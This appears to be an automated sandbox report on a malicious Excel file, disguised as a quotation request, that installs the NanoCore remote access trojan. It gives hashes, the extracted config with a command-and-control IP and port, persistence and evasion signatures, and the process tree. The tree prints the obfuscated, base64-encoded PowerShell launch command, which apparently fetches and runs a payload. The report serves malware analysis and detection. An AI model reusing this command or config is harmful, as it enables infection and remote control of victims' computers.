nanocore | 0460eaab50a96b4024770dc1a1e052132e7391007c2707a8f38eb255bbf643ac

Analysis

max time kernel
118s
max time network
151s
platform
windows10_x64
resource
win10-en
submitted
15-09-2021 06:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

New_Inquiry_andQuotation#RFQ091421B87344_Request_Samples_and_Products_NORDY.xls
Size

39KB
MD5

b003e33c743da4d4f69184e9db2c4862
SHA1

bb6b3cc70a7e0463bc2914e478ffa40bba1cdf69
SHA256

0460eaab50a96b4024770dc1a1e052132e7391007c2707a8f38eb255bbf643ac
SHA512

0544bae6054ba536b9027698134b15459888d6a86240966623311592c9eac2ba36664dee8725a985922deebe23d566927f37ae41c15ae2c1b46462c047220f6d

Score

10^/10

nanocore keylogger persistence spyware stealer suricata trojan

Malware Config

Extracted

Family

nanocore

Version

1.2.2.0

185.140.53.52:4488

Mutex

f373bcfb-36f5-4636-8770-9da829010f62

Attributes

activate_away_mode
true
backup_connection_host
backup_dns_server
8.8.4.4
buffer_size
65535
build_time
2021-06-03T23:05:48.798919236Z
bypass_user_account_control
false
bypass_user_account_control_data
PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTE2Ij8+DQo8VGFzayB2ZXJzaW9uPSIxLjIiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmRvd3MvMjAwNC8wMi9taXQvdGFzayI+DQogIDxSZWdpc3RyYXRpb25JbmZvIC8+DQogIDxUcmlnZ2VycyAvPg0KICA8UHJpbmNpcGFscz4NCiAgICA8UHJpbmNpcGFsIGlkPSJBdXRob3IiPg0KICAgICAgPExvZ29uVHlwZT5JbnRlcmFjdGl2ZVRva2VuPC9Mb2dvblR5cGU+DQogICAgICA8UnVuTGV2ZWw+SGlnaGVzdEF2YWlsYWJsZTwvUnVuTGV2ZWw+DQogICAgPC9QcmluY2lwYWw+DQogIDwvUHJpbmNpcGFscz4NCiAgPFNldHRpbmdzPg0KICAgIDxNdWx0aXBsZUluc3RhbmNlc1BvbGljeT5QYXJhbGxlbDwvTXVsdGlwbGVJbnN0YW5jZXNQb2xpY3k+DQogICAgPERpc2FsbG93U3RhcnRJZk9uQmF0dGVyaWVzPmZhbHNlPC9EaXNhbGxvd1N0YXJ0SWZPbkJhdHRlcmllcz4NCiAgICA8U3RvcElmR29pbmdPbkJhdHRlcmllcz5mYWxzZTwvU3RvcElmR29pbmdPbkJhdHRlcmllcz4NCiAgICA8QWxsb3dIYXJkVGVybWluYXRlPnRydWU8L0FsbG93SGFyZFRlcm1pbmF0ZT4NCiAgICA8U3RhcnRXaGVuQXZhaWxhYmxlPmZhbHNlPC9TdGFydFdoZW5BdmFpbGFibGU+DQogICAgPFJ1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+ZmFsc2U8L1J1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+DQogICAgPElkbGVTZXR0aW5ncz4NCiAgICAgIDxTdG9wT25JZGxlRW5kPmZhbHNlPC9TdG9wT25JZGxlRW5kPg0KICAgICAgPFJlc3RhcnRPbklkbGU+ZmFsc2U8L1Jlc3RhcnRPbklkbGU+DQogICAgPC9JZGxlU2V0dGluZ3M+DQogICAgPEFsbG93U3RhcnRPbkRlbWFuZD50cnVlPC9BbGxvd1N0YXJ0T25EZW1hbmQ+DQogICAgPEVuYWJsZWQ+dHJ1ZTwvRW5hYmxlZD4NCiAgICA8SGlkZGVuPmZhbHNlPC9IaWRkZW4+DQogICAgPFJ1bk9ubHlJZklkbGU+ZmFsc2U8L1J1bk9ubHlJZklkbGU+DQogICAgPFdha2VUb1J1bj5mYWxzZTwvV2FrZVRvUnVuPg0KICAgIDxFeGVjdXRpb25UaW1lTGltaXQ+UFQwUzwvRXhlY3V0aW9uVGltZUxpbWl0Pg0KICAgIDxQcmlvcml0eT40PC9Qcmlvcml0eT4NCiAgPC9TZXR0aW5ncz4NCiAgPEFjdGlvbnMgQ29udGV4dD0iQXV0aG9yIj4NCiAgICA8RXhlYz4NCiAgICAgIDxDb21tYW5kPiIjRVhFQ1VUQUJMRVBBVEgiPC9Db21tYW5kPg0KICAgICAgPEFyZ3VtZW50cz4kKEFyZzApPC9Bcmd1bWVudHM+DQogICAgPC9FeGVjPg0KICA8L0FjdGlvbnM+DQo8L1Rhc2s+
clear_access_control
true
clear_zone_identifier
false
connect_delay
4000
connection_port
4488
default_group
AUGUST
enable_debug_mode
true
gc_threshold
1.048576e+07
keep_alive_timeout
30000
keyboard_logging
false
lan_timeout
2500
max_packet_size
1.048576e+07
mutex
f373bcfb-36f5-4636-8770-9da829010f62
mutex_timeout
5000
prevent_system_sleep
false
primary_connection_host
185.140.53.52
primary_dns_server
8.8.8.8
request_elevation
true
restart_delay
5000
run_delay
0
run_on_startup
false
set_critical_process
true
timeout_interval
5000
use_custom_dns_server
false
version
1.2.2.0
wan_timeout
8000

Signatures

NanoCore
NanoCore is a remote access tool (RAT) with a variety of capabilities.
keylogger trojan stealer spyware nanocore

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	656	3940	cmd.exe	EXCEL.EXE

suricata: ET MALWARE Possible NanoCore C2 60B
suricata: ET MALWARE Possible NanoCore C2 60B
suricata
Downloads MZ/PE file
Executes dropped EXE 1 IoCs

Processes:

Ksbonyprod.exe

pid process

3136 Ksbonyprod.exe

pid	process
3136	Ksbonyprod.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

ys.exeys.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\Chromes = "\"C:\\Users\\Admin\\AppData\\Local\\Chromes.exe\""	ys.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\SCSI Service = "C:\\Program Files (x86)\\SCSI Service\\scsisvc.exe"	ys.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

ys.exe

description pid process target process

PID 3564 set thread context of 1844 3564 ys.exe ys.exe

description	pid	process	target process
PID 3564 set thread context of 1844	3564	ys.exe	ys.exe

Drops file in Program Files directory 2 IoCs

Processes:

ys.exe

description	ioc	process
File created	C:\Program Files (x86)\SCSI Service\scsisvc.exe	ys.exe
File opened for modification	C:\Program Files (x86)\SCSI Service\scsisvc.exe	ys.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

2324 schtasks.exe
3052 schtasks.exe

pid	process
2324	schtasks.exe
3052	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Modifies registry class 1 IoCs

Processes:

ys.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings ys.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

3940 EXCEL.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings	ys.exe

pid	process
3940	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 26 IoCs

Processes:

powershell.exepowershell.exeys.exepowershell.exepowershell.exeys.exe

pid	process
488	powershell.exe
488	powershell.exe
488	powershell.exe
3740	powershell.exe
3740	powershell.exe
3740	powershell.exe
3564	ys.exe
3564	ys.exe
896	powershell.exe
896	powershell.exe
308	powershell.exe
1844	ys.exe
1844	ys.exe
1844	ys.exe
896	powershell.exe
308	powershell.exe
308	powershell.exe
1844	ys.exe
1844	ys.exe
1844	ys.exe
1844	ys.exe
1844	ys.exe
1844	ys.exe
1844	ys.exe
1844	ys.exe
1844	ys.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

ys.exe

pid process

1844 ys.exe

pid	process
1844	ys.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

powershell.exeys.exepowershell.exepowershell.exeKsbonyprod.exepowershell.exeys.exe

description	pid	process
Token: SeDebugPrivilege	488	powershell.exe
Token: SeDebugPrivilege	3564	ys.exe
Token: SeDebugPrivilege	3740	powershell.exe
Token: SeDebugPrivilege	896	powershell.exe
Token: SeDebugPrivilege	3136	Ksbonyprod.exe
Token: SeDebugPrivilege	308	powershell.exe
Token: SeDebugPrivilege	1844	ys.exe

Suspicious use of SetWindowsHookEx 8 IoCs

Processes:

EXCEL.EXE

pid process

3940 EXCEL.EXE
3940 EXCEL.EXE
3940 EXCEL.EXE
3940 EXCEL.EXE
3940 EXCEL.EXE
3940 EXCEL.EXE
3940 EXCEL.EXE
3940 EXCEL.EXE

pid	process
3940	EXCEL.EXE
3940	EXCEL.EXE
3940	EXCEL.EXE
3940	EXCEL.EXE
3940	EXCEL.EXE
3940	EXCEL.EXE
3940	EXCEL.EXE
3940	EXCEL.EXE

Suspicious use of WriteProcessMemory 39 IoCs

Processes:

EXCEL.EXEcmd.exepowershell.exeys.exeWScript.exeWScript.exeys.exeKsbonyprod.exe

description	pid	process	target process
PID 3940 wrote to memory of 656	3940	EXCEL.EXE	cmd.exe
PID 3940 wrote to memory of 656	3940	EXCEL.EXE	cmd.exe
PID 656 wrote to memory of 488	656	cmd.exe	powershell.exe
PID 656 wrote to memory of 488	656	cmd.exe	powershell.exe
PID 488 wrote to memory of 3564	488	powershell.exe	ys.exe
PID 488 wrote to memory of 3564	488	powershell.exe	ys.exe
PID 488 wrote to memory of 3564	488	powershell.exe	ys.exe
PID 3564 wrote to memory of 3740	3564	ys.exe	powershell.exe
PID 3564 wrote to memory of 3740	3564	ys.exe	powershell.exe
PID 3564 wrote to memory of 3740	3564	ys.exe	powershell.exe
PID 3564 wrote to memory of 3660	3564	ys.exe	WScript.exe
PID 3564 wrote to memory of 3660	3564	ys.exe	WScript.exe
PID 3564 wrote to memory of 3660	3564	ys.exe	WScript.exe
PID 3564 wrote to memory of 3832	3564	ys.exe	WScript.exe
PID 3564 wrote to memory of 3832	3564	ys.exe	WScript.exe
PID 3564 wrote to memory of 3832	3564	ys.exe	WScript.exe
PID 3564 wrote to memory of 1844	3564	ys.exe	ys.exe
PID 3564 wrote to memory of 1844	3564	ys.exe	ys.exe
PID 3564 wrote to memory of 1844	3564	ys.exe	ys.exe
PID 3564 wrote to memory of 1844	3564	ys.exe	ys.exe
PID 3564 wrote to memory of 1844	3564	ys.exe	ys.exe
PID 3564 wrote to memory of 1844	3564	ys.exe	ys.exe
PID 3564 wrote to memory of 1844	3564	ys.exe	ys.exe
PID 3564 wrote to memory of 1844	3564	ys.exe	ys.exe
PID 3660 wrote to memory of 896	3660	WScript.exe	powershell.exe
PID 3660 wrote to memory of 896	3660	WScript.exe	powershell.exe
PID 3660 wrote to memory of 896	3660	WScript.exe	powershell.exe
PID 3832 wrote to memory of 3136	3832	WScript.exe	Ksbonyprod.exe
PID 3832 wrote to memory of 3136	3832	WScript.exe	Ksbonyprod.exe
PID 3832 wrote to memory of 3136	3832	WScript.exe	Ksbonyprod.exe
PID 1844 wrote to memory of 2324	1844	ys.exe	schtasks.exe
PID 1844 wrote to memory of 2324	1844	ys.exe	schtasks.exe
PID 1844 wrote to memory of 2324	1844	ys.exe	schtasks.exe
PID 1844 wrote to memory of 3052	1844	ys.exe	schtasks.exe
PID 1844 wrote to memory of 3052	1844	ys.exe	schtasks.exe
PID 1844 wrote to memory of 3052	1844	ys.exe	schtasks.exe
PID 3136 wrote to memory of 308	3136	Ksbonyprod.exe	powershell.exe
PID 3136 wrote to memory of 308	3136	Ksbonyprod.exe	powershell.exe
PID 3136 wrote to memory of 308	3136	Ksbonyprod.exe	powershell.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\New_Inquiry_andQuotation#RFQ091421B87344_Request_Samples_and_Products_NORDY.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3940

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C Po^W^ERs^he^lL -E WwBTAFkAUwB0AGUAbQAuAFQARQB4AHQALgBFAE4AYwBPAGQASQBuAGcAXQA6ADoAdQBuAGkAQwBPAEQARQAuAEcARQBUAHMAdAByAGkATgBHACgAWwBTAFkAUwB0AEUATQAuAEMAbwBuAFYAZQBSAFQAXQA6ADoARgBSAE8ATQBCAGEAUwBlADYANABzAHQAcgBpAE4AZwAoACIAZABBAEIAeQBBAEgAawBBAEkAQQBCADcAQQBHAFkAQQBiAHcAQgB5AEEAQwBBAEEASwBBAEEAawBBAEcAawBBAFAAUQBBAHgAQQBEAHMAQQBJAEEAQQBrAEEARwBrAEEASQBBAEEAdABBAEcAdwBBAFoAUQBBAGcAQQBEAEUAQQBNAGcAQQB3AEEARABBAEEATQBBAEEANwBBAEMAQQBBAEoAQQBCAHAAQQBDAHMAQQBLAHcAQQBwAEEAQwBBAEEAZQB3AEEAawBBAEcAawBBAEwAQQBBAGkAQQBHAEEAQQBiAGcAQQBpAEEASAAwAEEAZgBRAEEAZwBBAEcATQBBAFkAUQBCADAAQQBHAE0AQQBhAEEAQgA3AEEASAAwAEEARABRAEEASwBBAEcAWQBBAGQAUQBCAHUAQQBHAE0AQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAZwBBAEgAWQBBAGMAQQBCAHoAQQBIAGMAQQBjAEEAQgB5AEEARwBnAEEAYQBnAEIAbgBBAEcASQBBAGMAUQBCAHMAQQBIAGsAQQBlAFEAQgBsAEEASABZAEEAYwBBAEIAdQBBAEcARQBBAGQAZwBCADAAQQBIAG8AQQBkAGcAQgBpAEEASABFAEEAYQBRAEIANQBBAEMAQQBBAEsAQQBBAGcAQQBDAFEAQQBlAEEAQgB2AEEARwBvAEEAWgB3AEIANQBBAEcATQBBAGEAQQBCAHQAQQBHAGMAQQBaAHcAQgBrAEEAQwBBAEEATABBAEEAZwBBAEMAUQBBAGEAdwBCAHgAQQBHAGMAQQBaAHcAQgAwAEEASABvAEEAZQBnAEIAbgBBAEcASQBBAGEAQQBCAGgAQQBHAE0AQQBJAEEAQQBwAEEAQQAwAEEAQwBnAEIANwBBAEMAQQBBAFMAUQBCAHQAQQBGAEEAQQBUAHcAQgBTAEEARgBRAEEATABRAEIAdABBAEcAOABBAFoAQQBCADEAQQBHAHcAQQBSAFEAQQBnAEEARwBJAEEAUwBRAEIAVQBBAEYATQBBAFYAQQBCAFMAQQBFAEUAQQBUAGcAQgBUAEEARQBZAEEAWgBRAEIAeQBBAEQAcwBBAEQAUQBBAEsAQQBGAE0AQQBWAEEAQgBoAEEASABJAEEAVgBBAEEAdABBAEcASQBBAGEAUQBCAFUAQQBIAE0AQQBWAEEAQgB5AEEARQBFAEEAVABnAEIAVABBAEUAWQBBAFoAUQBCAHkAQQBDAEEAQQBMAFEAQgB6AEEARQA4AEEAZABRAEIAeQBBAEcATQBBAFIAUQBBAGcAQQBDAFEAQQBlAEEAQgB2AEEARwBvAEEAWgB3AEIANQBBAEcATQBBAGEAQQBCAHQAQQBHAGMAQQBaAHcAQgBrAEEAQwBBAEEATABRAEIAawBBAEUAVQBBAFUAdwBCAFUAQQBHAGsAQQBUAGcAQgBoAEEARgBRAEEAUwBRAEIAUABBAEUANABBAEkAQQBBAGsAQQBHAHMAQQBjAFEAQgBuAEEARwBjAEEAZABBAEIANgBBAEgAbwBBAFoAdwBCAGkAQQBHAGcAQQBZAFEAQgBqAEEARABzAEEASQBBAEEAbQBBAEMAQQBBAEoAQQBCAHIAQQBIAEUAQQBaAHcAQgBuAEEASABRAEEAZQBnAEIANgBBAEcAYwBBAFkAZwBCAG8AQQBHAEUAQQBZAHcAQQA3AEEAQwBBAEEAZgBRAEIAMABBAEgASQBBAGUAUQBCADcAQQBDAFEAQQBkAGcAQgBoAEEASABvAEEAZQBnAEIAcgBBAEcASQBBAGIAdwBCADIAQQBIAG8AQQBaAEEAQgA1AEEASABNAEEAWQB3AEIAcwBBAEQAMABBAEoAQQBCAEYAQQBHADQAQQBWAGcAQQA2AEEASABRAEEAUgBRAEIATgBBAEYAQQBBAEsAdwBBAG4AQQBGAHcAQQBlAFEAQgB6AEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBADcAQQBBADAAQQBDAGcAQgAyAEEASABBAEEAYwB3AEIAMwBBAEgAQQBBAGMAZwBCAG8AQQBHAG8AQQBaAHcAQgBpAEEASABFAEEAYgBBAEIANQBBAEgAawBBAFoAUQBCADIAQQBIAEEAQQBiAGcAQgBoAEEASABZAEEAZABBAEIANgBBAEgAWQBBAFkAZwBCAHgAQQBHAGsAQQBlAFEAQQBnAEEAQwBjAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABNAEEAWgBRAEIAaQBBAEcARQBBAGMAdwBCADAAQQBHAGsAQQBZAFEAQgB1AEEASABNAEEAWQB3AEIAbwBBAEcAawBBAGIAZwBCAHUAQQBHAFUAQQBjAGcAQQB1AEEASABnAEEAZQBRAEIANgBBAEMAOABBAFEAUQBCAFYAQQBFAGMAQQBMAHcAQgBCAEEARQB3AEEAVABBAEEAdQBBAEcAVQBBAGUAQQBCAGwAQQBDAGMAQQBJAEEAQQBrAEEASABZAEEAWQBRAEIANgBBAEgAbwBBAGEAdwBCAGkAQQBHADgAQQBkAGcAQgA2AEEARwBRAEEAZQBRAEIAegBBAEcATQBBAGIAQQBBADcAQQBBADAAQQBDAGcAQgAyAEEASABBAEEAYwB3AEIAMwBBAEgAQQBBAGMAZwBCAG8AQQBHAG8AQQBaAHcAQgBpAEEASABFAEEAYgBBAEIANQBBAEgAawBBAFoAUQBCADIAQQBIAEEAQQBiAGcAQgBoAEEASABZAEEAZABBAEIANgBBAEgAWQBBAFkAZwBCAHgAQQBHAGsAQQBlAFEAQQBnAEEAQwBjAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABNAEEAWgBRAEIAaQBBAEcARQBBAGMAdwBCADAAQQBHAGsAQQBZAFEAQgB1AEEASABNAEEAWQB3AEIAbwBBAEcAawBBAGIAZwBCAHUAQQBHAFUAQQBjAGcAQQB1AEEASABnAEEAZQBRAEIANgBBAEMAOABBAFEAUQBCAFYAQQBFAGMAQQBMAHcAQgBCAEEARQB3AEEAVABBAEEAdQBBAEcAVQBBAGUAQQBCAGwAQQBDAGMAQQBJAEEAQQBrAEEASABZAEEAWQBRAEIANgBBAEgAbwBBAGEAdwBCAGkAQQBHADgAQQBkAGcAQgA2AEEARwBRAEEAZQBRAEIAegBBAEcATQBBAGIAQQBBADcAQQBBADAAQQBDAGcAQgAyAEEASABBAEEAYwB3AEIAMwBBAEgAQQBBAGMAZwBCAG8AQQBHAG8AQQBaAHcAQgBpAEEASABFAEEAYgBBAEIANQBBAEgAawBBAFoAUQBCADIAQQBIAEEAQQBiAGcAQgBoAEEASABZAEEAZABBAEIANgBBAEgAWQBBAFkAZwBCAHgAQQBHAGsAQQBlAFEAQQBnAEEAQwBjAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABNAEEAWgBRAEIAaQBBAEcARQBBAGMAdwBCADAAQQBHAGsAQQBZAFEAQgB1AEEASABNAEEAWQB3AEIAbwBBAEcAawBBAGIAZwBCAHUAQQBHAFUAQQBjAGcAQQB1AEEASABnAEEAZQBRAEIANgBBAEMAOABBAFEAUQBCAFYAQQBFAGMAQQBMAHcAQgBCAEEARQB3AEEAVABBAEEAdQBBAEcAVQBBAGUAQQBCAGwAQQBDAGMAQQBJAEEAQQBrAEEASABZAEEAWQBRAEIANgBBAEgAbwBBAGEAdwBCAGkAQQBHADgAQQBkAGcAQgA2AEEARwBRAEEAZQBRAEIAegBBAEcATQBBAGIAQQBBADcAQQBBADAAQQBDAGcAQgA5AEEARwBNAEEAWQBRAEIAMABBAEcATQBBAGEAQQBCADcAQQBIADAAQQAiACkAKQB8AGkARQBYAA==
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:656

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PoWERshelL -E WwBTAFkAUwB0AGUAbQAuAFQARQB4AHQALgBFAE4AYwBPAGQASQBuAGcAXQA6ADoAdQBuAGkAQwBPAEQARQAuAEcARQBUAHMAdAByAGkATgBHACgAWwBTAFkAUwB0AEUATQAuAEMAbwBuAFYAZQBSAFQAXQA6ADoARgBSAE8ATQBCAGEAUwBlADYANABzAHQAcgBpAE4AZwAoACIAZABBAEIAeQBBAEgAawBBAEkAQQBCADcAQQBHAFkAQQBiAHcAQgB5AEEAQwBBAEEASwBBAEEAawBBAEcAawBBAFAAUQBBAHgAQQBEAHMAQQBJAEEAQQBrAEEARwBrAEEASQBBAEEAdABBAEcAdwBBAFoAUQBBAGcAQQBEAEUAQQBNAGcAQQB3AEEARABBAEEATQBBAEEANwBBAEMAQQBBAEoAQQBCAHAAQQBDAHMAQQBLAHcAQQBwAEEAQwBBAEEAZQB3AEEAawBBAEcAawBBAEwAQQBBAGkAQQBHAEEAQQBiAGcAQQBpAEEASAAwAEEAZgBRAEEAZwBBAEcATQBBAFkAUQBCADAAQQBHAE0AQQBhAEEAQgA3AEEASAAwAEEARABRAEEASwBBAEcAWQBBAGQAUQBCAHUAQQBHAE0AQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAZwBBAEgAWQBBAGMAQQBCAHoAQQBIAGMAQQBjAEEAQgB5AEEARwBnAEEAYQBnAEIAbgBBAEcASQBBAGMAUQBCAHMAQQBIAGsAQQBlAFEAQgBsAEEASABZAEEAYwBBAEIAdQBBAEcARQBBAGQAZwBCADAAQQBIAG8AQQBkAGcAQgBpAEEASABFAEEAYQBRAEIANQBBAEMAQQBBAEsAQQBBAGcAQQBDAFEAQQBlAEEAQgB2AEEARwBvAEEAWgB3AEIANQBBAEcATQBBAGEAQQBCAHQAQQBHAGMAQQBaAHcAQgBrAEEAQwBBAEEATABBAEEAZwBBAEMAUQBBAGEAdwBCAHgAQQBHAGMAQQBaAHcAQgAwAEEASABvAEEAZQBnAEIAbgBBAEcASQBBAGEAQQBCAGgAQQBHAE0AQQBJAEEAQQBwAEEAQQAwAEEAQwBnAEIANwBBAEMAQQBBAFMAUQBCAHQAQQBGAEEAQQBUAHcAQgBTAEEARgBRAEEATABRAEIAdABBAEcAOABBAFoAQQBCADEAQQBHAHcAQQBSAFEAQQBnAEEARwBJAEEAUwBRAEIAVQBBAEYATQBBAFYAQQBCAFMAQQBFAEUAQQBUAGcAQgBUAEEARQBZAEEAWgBRAEIAeQBBAEQAcwBBAEQAUQBBAEsAQQBGAE0AQQBWAEEAQgBoAEEASABJAEEAVgBBAEEAdABBAEcASQBBAGEAUQBCAFUAQQBIAE0AQQBWAEEAQgB5AEEARQBFAEEAVABnAEIAVABBAEUAWQBBAFoAUQBCAHkAQQBDAEEAQQBMAFEAQgB6AEEARQA4AEEAZABRAEIAeQBBAEcATQBBAFIAUQBBAGcAQQBDAFEAQQBlAEEAQgB2AEEARwBvAEEAWgB3AEIANQBBAEcATQBBAGEAQQBCAHQAQQBHAGMAQQBaAHcAQgBrAEEAQwBBAEEATABRAEIAawBBAEUAVQBBAFUAdwBCAFUAQQBHAGsAQQBUAGcAQgBoAEEARgBRAEEAUwBRAEIAUABBAEUANABBAEkAQQBBAGsAQQBHAHMAQQBjAFEAQgBuAEEARwBjAEEAZABBAEIANgBBAEgAbwBBAFoAdwBCAGkAQQBHAGcAQQBZAFEAQgBqAEEARABzAEEASQBBAEEAbQBBAEMAQQBBAEoAQQBCAHIAQQBIAEUAQQBaAHcAQgBuAEEASABRAEEAZQBnAEIANgBBAEcAYwBBAFkAZwBCAG8AQQBHAEUAQQBZAHcAQQA3AEEAQwBBAEEAZgBRAEIAMABBAEgASQBBAGUAUQBCADcAQQBDAFEAQQBkAGcAQgBoAEEASABvAEEAZQBnAEIAcgBBAEcASQBBAGIAdwBCADIAQQBIAG8AQQBaAEEAQgA1AEEASABNAEEAWQB3AEIAcwBBAEQAMABBAEoAQQBCAEYAQQBHADQAQQBWAGcAQQA2AEEASABRAEEAUgBRAEIATgBBAEYAQQBBAEsAdwBBAG4AQQBGAHcAQQBlAFEAQgB6AEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBADcAQQBBADAAQQBDAGcAQgAyAEEASABBAEEAYwB3AEIAMwBBAEgAQQBBAGMAZwBCAG8AQQBHAG8AQQBaAHcAQgBpAEEASABFAEEAYgBBAEIANQBBAEgAawBBAFoAUQBCADIAQQBIAEEAQQBiAGcAQgBoAEEASABZAEEAZABBAEIANgBBAEgAWQBBAFkAZwBCAHgAQQBHAGsAQQBlAFEAQQBnAEEAQwBjAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABNAEEAWgBRAEIAaQBBAEcARQBBAGMAdwBCADAAQQBHAGsAQQBZAFEAQgB1AEEASABNAEEAWQB3AEIAbwBBAEcAawBBAGIAZwBCAHUAQQBHAFUAQQBjAGcAQQB1AEEASABnAEEAZQBRAEIANgBBAEMAOABBAFEAUQBCAFYAQQBFAGMAQQBMAHcAQgBCAEEARQB3AEEAVABBAEEAdQBBAEcAVQBBAGUAQQBCAGwAQQBDAGMAQQBJAEEAQQBrAEEASABZAEEAWQBRAEIANgBBAEgAbwBBAGEAdwBCAGkAQQBHADgAQQBkAGcAQgA2AEEARwBRAEEAZQBRAEIAegBBAEcATQBBAGIAQQBBADcAQQBBADAAQQBDAGcAQgAyAEEASABBAEEAYwB3AEIAMwBBAEgAQQBBAGMAZwBCAG8AQQBHAG8AQQBaAHcAQgBpAEEASABFAEEAYgBBAEIANQBBAEgAawBBAFoAUQBCADIAQQBIAEEAQQBiAGcAQgBoAEEASABZAEEAZABBAEIANgBBAEgAWQBBAFkAZwBCAHgAQQBHAGsAQQBlAFEAQQBnAEEAQwBjAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABNAEEAWgBRAEIAaQBBAEcARQBBAGMAdwBCADAAQQBHAGsAQQBZAFEAQgB1AEEASABNAEEAWQB3AEIAbwBBAEcAawBBAGIAZwBCAHUAQQBHAFUAQQBjAGcAQQB1AEEASABnAEEAZQBRAEIANgBBAEMAOABBAFEAUQBCAFYAQQBFAGMAQQBMAHcAQgBCAEEARQB3AEEAVABBAEEAdQBBAEcAVQBBAGUAQQBCAGwAQQBDAGMAQQBJAEEAQQBrAEEASABZAEEAWQBRAEIANgBBAEgAbwBBAGEAdwBCAGkAQQBHADgAQQBkAGcAQgA2AEEARwBRAEEAZQBRAEIAegBBAEcATQBBAGIAQQBBADcAQQBBADAAQQBDAGcAQgAyAEEASABBAEEAYwB3AEIAMwBBAEgAQQBBAGMAZwBCAG8AQQBHAG8AQQBaAHcAQgBpAEEASABFAEEAYgBBAEIANQBBAEgAawBBAFoAUQBCADIAQQBIAEEAQQBiAGcAQgBoAEEASABZAEEAZABBAEIANgBBAEgAWQBBAFkAZwBCAHgAQQBHAGsAQQBlAFEAQQBnAEEAQwBjAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABNAEEAWgBRAEIAaQBBAEcARQBBAGMAdwBCADAAQQBHAGsAQQBZAFEAQgB1AEEASABNAEEAWQB3AEIAbwBBAEcAawBBAGIAZwBCAHUAQQBHAFUAQQBjAGcAQQB1AEEASABnAEEAZQBRAEIANgBBAEMAOABBAFEAUQBCAFYAQQBFAGMAQQBMAHcAQgBCAEEARQB3AEEAVABBAEEAdQBBAEcAVQBBAGUAQQBCAGwAQQBDAGMAQQBJAEEAQQBrAEEASABZAEEAWQBRAEIANgBBAEgAbwBBAGEAdwBCAGkAQQBHADgAQQBkAGcAQgA2AEEARwBRAEEAZQBRAEIAegBBAEcATQBBAGIAQQBBADcAQQBBADAAQQBDAGcAQgA5AEEARwBNAEEAWQBRAEIAMABBAEcATQBBAGEAQQBCADcAQQBIADAAQQAiACkAKQB8AGkARQBYAA==
3⤵
- Suspicious behavior: EnumeratesProcesses
